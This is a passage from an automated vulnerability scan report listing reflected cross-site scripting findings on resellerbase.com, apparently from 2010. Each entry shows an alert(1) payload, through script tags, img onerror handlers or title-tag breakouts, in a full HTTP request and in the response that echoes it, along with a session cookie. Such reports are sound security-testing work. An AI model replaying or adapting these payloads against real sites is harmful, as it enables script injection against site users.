2.4549. http://www.resellerbase.com/tag/themes/kosmos/images/review/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ba430<img%20src%3da%20onerror%3dalert(1)>5f07d888b71 was submitted in the REST URL parameter 2. This input was echoed as ba430<img src=a onerror=alert(1)>5f07d888b71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themesba430<img%20src%3da%20onerror%3dalert(1)>5f07d888b71/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themesba430<img src=a onerror=alert(1)>5f07d888b71/kosmos/images/review/0.gif]</td>
...[SNIP]...

2.4550. http://www.resellerbase.com/tag/themes/kosmos/images/review/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload c8786</title><img%20src%3da%20onerror%3dalert(1)>8362bf09e3e was submitted in the REST URL parameter 2. This input was echoed as c8786</title><img src=a onerror=alert(1)>8362bf09e3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themesc8786</title><img%20src%3da%20onerror%3dalert(1)>8362bf09e3e/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themesc8786</title><img src=a onerror=alert(1)>8362bf09e3e/kosmos/images/review/0.gif</title>
...[SNIP]...

2.4551. http://www.resellerbase.com/tag/themes/kosmos/images/review/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f1815<img%20src%3da%20onerror%3dalert(1)>a4ee42b0d0f was submitted in the REST URL parameter 3. This input was echoed as f1815<img src=a onerror=alert(1)>a4ee42b0d0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmosf1815<img%20src%3da%20onerror%3dalert(1)>a4ee42b0d0f/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmosf1815<img src=a onerror=alert(1)>a4ee42b0d0f/images/review/0.gif]</td>
...[SNIP]...

2.4552. http://www.resellerbase.com/tag/themes/kosmos/images/review/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 978fe</title><img%20src%3da%20onerror%3dalert(1)>a36605842ed was submitted in the REST URL parameter 3. This input was echoed as 978fe</title><img src=a onerror=alert(1)>a36605842ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos978fe</title><img%20src%3da%20onerror%3dalert(1)>a36605842ed/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos978fe</title><img src=a onerror=alert(1)>a36605842ed/images/review/0.gif</title>
...[SNIP]...

2.4553. http://www.resellerbase.com/tag/themes/kosmos/images/review/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload c9489</title><img%20src%3da%20onerror%3dalert(1)>b81f2bd1a37 was submitted in the REST URL parameter 4. This input was echoed as c9489</title><img src=a onerror=alert(1)>b81f2bd1a37 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/imagesc9489</title><img%20src%3da%20onerror%3dalert(1)>b81f2bd1a37/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/imagesc9489</title><img src=a onerror=alert(1)>b81f2bd1a37/review/0.gif</title>
...[SNIP]...

2.4554. http://www.resellerbase.com/tag/themes/kosmos/images/review/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 135c8<img%20src%3da%20onerror%3dalert(1)>f65d9a6d1cb was submitted in the REST URL parameter 4. This input was echoed as 135c8<img src=a onerror=alert(1)>f65d9a6d1cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images135c8<img%20src%3da%20onerror%3dalert(1)>f65d9a6d1cb/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images135c8<img src=a onerror=alert(1)>f65d9a6d1cb/review/0.gif]</td>
...[SNIP]...

2.4555. http://www.resellerbase.com/tag/themes/kosmos/images/review/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload 9ef4e</title><img%20src%3da%20onerror%3dalert(1)>41fca3dcbf1 was submitted in the REST URL parameter 5. This input was echoed as 9ef4e</title><img src=a onerror=alert(1)>41fca3dcbf1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/review9ef4e</title><img%20src%3da%20onerror%3dalert(1)>41fca3dcbf1/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/review9ef4e</title><img src=a onerror=alert(1)>41fca3dcbf1/0.gif</title>
...[SNIP]...

2.4556. http://www.resellerbase.com/tag/themes/kosmos/images/review/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6abcc<img%20src%3da%20onerror%3dalert(1)>6eef3525099 was submitted in the REST URL parameter 5. This input was echoed as 6abcc<img src=a onerror=alert(1)>6eef3525099 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/review6abcc<img%20src%3da%20onerror%3dalert(1)>6eef3525099/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/review6abcc<img src=a onerror=alert(1)>6eef3525099/0.gif]</td>
...[SNIP]...

2.4557. http://www.resellerbase.com/tag/themes/kosmos/images/review/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 6999b<img%20src%3da%20onerror%3dalert(1)>f4d1777a053 was submitted in the REST URL parameter 6. This input was echoed as 6999b<img src=a onerror=alert(1)>f4d1777a053 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/review/0.gif6999b<img%20src%3da%20onerror%3dalert(1)>f4d1777a053 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/review/0.gif6999b<img src=a onerror=alert(1)>f4d1777a053]</td>
...[SNIP]...

2.4558. http://www.resellerbase.com/tag/themes/kosmos/images/review/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload 31bb1</title><img%20src%3da%20onerror%3dalert(1)>2ecdfea137d was submitted in the REST URL parameter 6. This input was echoed as 31bb1</title><img src=a onerror=alert(1)>2ecdfea137d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/review/0.gif31bb1</title><img%20src%3da%20onerror%3dalert(1)>2ecdfea137d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/review/0.gif31bb1</title><img src=a onerror=alert(1)>2ecdfea137d</title>
...[SNIP]...

2.4559. http://www.resellerbase.com/tag/themes/kosmos/images/review/5.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ab9eb<script>alert(1)</script>7adf15403 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagab9eb<script>alert(1)</script>7adf15403/themes/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagab9eb<script>alert(1)</script>7adf15403/themes/kosmos/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.4560. http://www.resellerbase.com/tag/themes/kosmos/images/review/5.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 1f254</title><img%20src%3da%20onerror%3dalert(1)>c9dcf49b9c3 was submitted in the REST URL parameter 2. This input was echoed as 1f254</title><img src=a onerror=alert(1)>c9dcf49b9c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes1f254</title><img%20src%3da%20onerror%3dalert(1)>c9dcf49b9c3/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes1f254</title><img src=a onerror=alert(1)>c9dcf49b9c3/kosmos/images/review/5.gif</title>
...[SNIP]...

2.4561. http://www.resellerbase.com/tag/themes/kosmos/images/review/5.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 73c20<img%20src%3da%20onerror%3dalert(1)>de197d871eb was submitted in the REST URL parameter 2. This input was echoed as 73c20<img src=a onerror=alert(1)>de197d871eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes73c20<img%20src%3da%20onerror%3dalert(1)>de197d871eb/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes73c20<img src=a onerror=alert(1)>de197d871eb/kosmos/images/review/5.gif]</td>
...[SNIP]...

2.4562. http://www.resellerbase.com/tag/themes/kosmos/images/review/5.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 26a22</title><img%20src%3da%20onerror%3dalert(1)>b5c23eece56 was submitted in the REST URL parameter 3. This input was echoed as 26a22</title><img src=a onerror=alert(1)>b5c23eece56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos26a22</title><img%20src%3da%20onerror%3dalert(1)>b5c23eece56/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos26a22</title><img src=a onerror=alert(1)>b5c23eece56/images/review/5.gif</title>
...[SNIP]...

2.4563. http://www.resellerbase.com/tag/themes/kosmos/images/review/5.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1b6ec<img%20src%3da%20onerror%3dalert(1)>66b9fee49e2 was submitted in the REST URL parameter 3. This input was echoed as 1b6ec<img src=a onerror=alert(1)>66b9fee49e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos1b6ec<img%20src%3da%20onerror%3dalert(1)>66b9fee49e2/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos1b6ec<img src=a onerror=alert(1)>66b9fee49e2/images/review/5.gif]</td>
...[SNIP]...

2.4564. http://www.resellerbase.com/tag/themes/kosmos/images/review/5.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload d8086</title><img%20src%3da%20onerror%3dalert(1)>27f40a90020 was submitted in the REST URL parameter 4. This input was echoed as d8086</title><img src=a onerror=alert(1)>27f40a90020 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/imagesd8086</title><img%20src%3da%20onerror%3dalert(1)>27f40a90020/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/imagesd8086</title><img src=a onerror=alert(1)>27f40a90020/review/5.gif</title>
...[SNIP]...

2.4565. http://www.resellerbase.com/tag/themes/kosmos/images/review/5.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 10678<img%20src%3da%20onerror%3dalert(1)>8b976eb1078 was submitted in the REST URL parameter 4. This input was echoed as 10678<img src=a onerror=alert(1)>8b976eb1078 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images10678<img%20src%3da%20onerror%3dalert(1)>8b976eb1078/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images10678<img src=a onerror=alert(1)>8b976eb1078/review/5.gif]</td>
...[SNIP]...

2.4566. http://www.resellerbase.com/tag/themes/kosmos/images/review/5.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f2129<img%20src%3da%20onerror%3dalert(1)>e20cd9f539b was submitted in the REST URL parameter 5. This input was echoed as f2129<img src=a onerror=alert(1)>e20cd9f539b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/reviewf2129<img%20src%3da%20onerror%3dalert(1)>e20cd9f539b/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

